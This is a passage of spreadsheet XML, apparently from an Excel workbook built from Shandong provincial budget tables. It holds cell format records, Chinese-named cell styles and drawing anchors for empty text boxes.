    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="27" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="27" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="27" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="27" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="27" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="31"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4" fillId="0" borderId="0" xfId="10" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="5" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="7" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="7" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="4" fillId="0" borderId="0" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="4" fillId="0" borderId="0" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="4" fillId="0" borderId="0" xfId="48" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="1" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="2" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="4" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="37" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="25" fillId="0" borderId="0" xfId="48" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="48" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="180" fontId="1" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="8" xfId="20" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="9" xfId="20" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="5" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="6" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="7" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="1" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="5" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="183" fontId="2" fillId="0" borderId="2" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="183" fontId="2" fillId="0" borderId="4" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="183" fontId="2" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="5" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="6" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="7" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="3" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="20" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="1"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13" fillId="0" borderId="3"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4" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="12" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="0" xfId="12" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="0" borderId="0" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="9" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="13" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="13" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="55" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="177" fontId="1" fillId="0" borderId="17" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="52">
    <cellStyle name="_ET_STYLE_NoName_00_" xfId="6"/>
    <cellStyle name="Normal" xfId="16"/>
    <cellStyle name="百分比" xfId="4" builtinId="5"/>
    <cellStyle name="百分比 2 10" xfId="17"/>
    <cellStyle name="百分比 2 2" xfId="8"/>
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 10" xfId="14"/>
    <cellStyle name="常规 10 2 3" xfId="18"/>
    <cellStyle name="常规 10 3" xfId="1"/>
    <cellStyle name="常规 100" xfId="15"/>
    <cellStyle name="常规 104" xfId="10"/>
    <cellStyle name="常规 104 2" xfId="19"/>
    <cellStyle name="常规 104 2 2" xfId="13"/>
    <cellStyle name="常规 104 3" xfId="7"/>
    <cellStyle name="常规 107" xfId="12"/>
    <cellStyle name="常规 107 2" xfId="11"/>
    <cellStyle name="常规 107 3" xfId="20"/>
    <cellStyle name="常规 11 3 2" xfId="21"/>
    <cellStyle name="常规 112 2 2" xfId="22"/>
    <cellStyle name="常规 112 3 2" xfId="9"/>
    <cellStyle name="常规 12" xfId="23"/>
    <cellStyle name="常规 2" xfId="24"/>
    <cellStyle name="常规 2 2" xfId="25"/>
    <cellStyle name="常规 2 2 3_2016年省级收入和财力预计情况表（2015-12-19更新11月份数据）" xfId="26"/>
    <cellStyle name="常规 3" xfId="27"/>
    <cellStyle name="常规 4" xfId="28"/>
    <cellStyle name="常规 5" xfId="29"/>
    <cellStyle name="常规 6" xfId="5"/>
    <cellStyle name="常规 6 2" xfId="30"/>
    <cellStyle name="常规_11月小本" xfId="31"/>
    <cellStyle name="常规_11月小本 2" xfId="32"/>
    <cellStyle name="常规_11月小本 2 2" xfId="33"/>
    <cellStyle name="常规_1998年标准人口(回归法）" xfId="34"/>
    <cellStyle name="常规_2009年初两会支出调整后（国库处）" xfId="35"/>
    <cellStyle name="常规_2012年国有资本经营预算报表（只含山东省本级报省人代会审议2）" xfId="36"/>
    <cellStyle name="常规_2012年国有资本经营预算报表（只含山东省本级报省人代会审议2） 2" xfId="37"/>
    <cellStyle name="常规_2015年国资预算表（报预算处2）" xfId="38"/>
    <cellStyle name="常规_CAEB7992B5944DABA9EFEFD4983508AB" xfId="39"/>
    <cellStyle name="常规_norma1" xfId="40"/>
    <cellStyle name="常规_表1" xfId="41"/>
    <cellStyle name="常规_表18 2" xfId="42"/>
    <cellStyle name="常规_表262014年山东省社会保险基金预算收支草案表（1月3日）" xfId="43"/>
    <cellStyle name="常规_各市及省级预算外年终数据(2008年1月1日)" xfId="44"/>
    <cellStyle name="常规_各市及省级预算外年终数据(2008年1月1日) 2" xfId="45"/>
    <cellStyle name="常规_基本情况基础表" xfId="46"/>
    <cellStyle name="常规_人代会表(0107填报） 2" xfId="47"/>
    <cellStyle name="常规_社保处（2015年社会保险基金预算）(2)" xfId="48"/>
    <cellStyle name="常规_市直3-6" xfId="49"/>
    <cellStyle name="千位分隔" xfId="3" builtinId="3"/>
    <cellStyle name="千位分隔[0]" xfId="2" builtinId="6"/>
    <cellStyle name="千位分隔[0] 2 2" xfId="50"/>
    <cellStyle name="样式 1" xfId="51"/>
  </cellStyles>
  <dxfs count="0"/>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FFFFFFFF"/>
      <color rgb="FF000000"/>
      <color rgb="FF00B050"/>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2</xdr:col>
      <xdr:colOff>78740</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>236855</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="Text Box 1025"/>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236855</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="Text Box 1027"/>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236855</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="4" name="Text Box 1025"/>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5"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6"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21</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>78740</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>162560</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="7" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="693293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8" name="Text Box 1025"/>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9" name="Text Box 1027"/>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0"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1"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2"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3"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6"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7"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8"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9"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0"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2"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24</xdr:row>
      <xdr:rowOff>4949</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="23" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>
          <a:ext cx="78740" cy="30924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4"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5"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26"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27" name="Text Box 1027"/>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8"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9" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="129794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0" name="Text Box 1027"/>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1" name="Text Box 1025"/>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40399</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="32" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>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40399</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="33" name="Text Box 1027"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>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11189</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="34" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>
          <a:ext cx="78740" cy="16319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35" name="Text Box 1025"/>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36" name="Text Box 1027"/>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37" name="Text Box 1025"/>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38"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39"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21</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>86995</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>170815</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="40" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="6932930"/>
          <a:ext cx="86995" cy="1708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41"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42" name="Text Box 1027"/>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3"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4"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5"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7"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8"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49"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0"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1"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3"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4"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5"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24</xdr:row>
      <xdr:rowOff>4948</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="56" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>
          <a:ext cx="86995" cy="3092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7"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58"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59"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60" name="Text Box 1027"/>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61"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62"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63"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64"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65" name="Text Box 1025"/>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66" name="Text Box 1027"/>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67" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="1297940"/>
          <a:ext cx="86995"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68" name="Text Box 1025"/>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69" name="Text Box 1027"/>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70" name="Text Box 1025"/>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71"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2"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3"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74" name="Text Box 1025"/>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75" name="Text Box 1027"/>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6"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7"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8"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79"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0"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1"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2"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3"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4"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5"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6"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7"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88"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24</xdr:row>
      <xdr:rowOff>4949</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="89" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>
          <a:ext cx="78740" cy="30924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90"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91"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92"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120125</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="93" name="Text Box 1027"/>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94"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95" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="129794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6" name="Text Box 1027"/>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7" name="Text Box 1025"/>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27064</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="98" name="Text Box 1025"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>
          <a:ext cx="78740" cy="17907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27064</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="99" name="Text Box 1027"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3859530" y="7264400"/>
